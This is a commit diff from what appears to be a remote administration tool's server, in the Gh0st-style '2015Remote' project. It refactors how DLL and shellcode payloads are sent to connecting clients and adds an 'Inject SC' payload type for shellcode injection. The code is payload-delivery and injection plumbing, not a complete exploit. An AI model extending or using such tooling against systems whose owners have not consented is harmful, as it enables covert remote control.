Refactor: Remove SCLoader.cpp and use the received DLL to inject

2026-05-25 00:16:39 +02:00
parent 54c88539e5
commit d6fb612475
6 changed files with 55 additions and 10379 deletions
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
@@ -5734,14 +5734,14 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject)
        // 检查是否被限流（只限制真实发送 DLL 的请求）
        if (IsDllRequestLimited(clientIP)) {
            Mprintf("'%s' Request %s [is64Bit:%d isRelease:%d] SendServerDll: RateLimited\n",
-                    clientIP.c_str(), typ == SHELLCODE ? "SC" : "DLL", is64Bit, isRelease);
+                    clientIP.c_str(), (typ != MEMORYDLL) ? "SC" : "DLL", is64Bit, isRelease);
        } else {
-            send = SendServerDll(ContextObject, typ==MEMORYDLL, is64Bit);
+            send = SendServerDll(ContextObject, typ, is64Bit);
            if (send) {
                RecordDllRequest(clientIP);  // 只有真正发送了才记录
            }
            Mprintf("'%s' Request %s [is64Bit:%d isRelease:%d] SendServerDll: %s\n",
-                    clientIP.c_str(), typ == SHELLCODE ? "SC" : "DLL", is64Bit, isRelease, send ? "Yes" : "No");
+                    clientIP.c_str(), (typ != MEMORYDLL) ? "SC" : "DLL", is64Bit, isRelease, send ? "Yes" : "No");
        }
        break;
    }
@@ -6898,10 +6898,11 @@ bool isAllZeros(const BYTE* data, int len)
    return true;
 }

-BOOL CMy2015RemoteDlg::SendServerDll(CONTEXT_OBJECT* ContextObject, bool isDLL, bool is64Bit)
+BOOL CMy2015RemoteDlg::SendServerDll(CONTEXT_OBJECT* ContextObject, int payloadType, bool is64Bit)
 {
+    auto isDLL = payloadType == MEMORYDLL;
    auto id = is64Bit ? PAYLOAD_DLL_X64 : PAYLOAD_DLL_X86;
-    auto buf = isDLL ? m_ServerDLL[id] : m_ServerBin[id];
+    auto buf = isDLL ? m_ServerDLL[id] : payloadType == SHELLCODE ? m_ServerBin[id] : m_TinyRun[id];
    if (buf->length()) {
        char version[12] = {};
        ContextObject->InDeCompressedBuffer.CopyBuffer(version, 12, 4);
--- a/server/2015Remote/2015RemoteDlg.h
+++ b/server/2015Remote/2015RemoteDlg.h
@@ -219,7 +219,7 @@ public:
    void SendFilesToClientV2Internal(context* mainCtx, const std::vector<std::string>& files,
        uint64_t resumeTransferID, const std::map<uint32_t, uint64_t>& startOffsets, const std::string& targetDir = "");
    void HandleFileResumeRequest(CONTEXT_OBJECT* ctx, const BYTE* data, size_t len);
-    BOOL SendServerDll(CONTEXT_OBJECT* ContextObject, bool isDLL, bool is64Bit);
+    BOOL SendServerDll(CONTEXT_OBJECT* ContextObject, int payloadType, bool is64Bit);
    Buffer* m_ServerDLL[PAYLOAD_MAXTYPE];
    Buffer* m_ServerBin[PAYLOAD_MAXTYPE];
    Buffer* m_TinyRun[PAYLOAD_MAXTYPE] = {};
--- a/server/2015Remote/PluginSettingsDlg.cpp
+++ b/server/2015Remote/PluginSettingsDlg.cpp
@@ -108,7 +108,7 @@ void CPluginSettingsDlg::LoadPluginsToList()
 {
    m_listPlugins.DeleteAllItems();

-    const char* runTypeNames[] = { "Shellcode", "内存DLL" };
+    const char* runTypeNames[] = { "Shellcode", "内存DLL", "Inject SC"};
    const char* modeNames[] = { "不自动执行", "启动执行", "每日定时", "每周定时", "每月定时", "每年定时", "关闭执行", };

    int index = 0;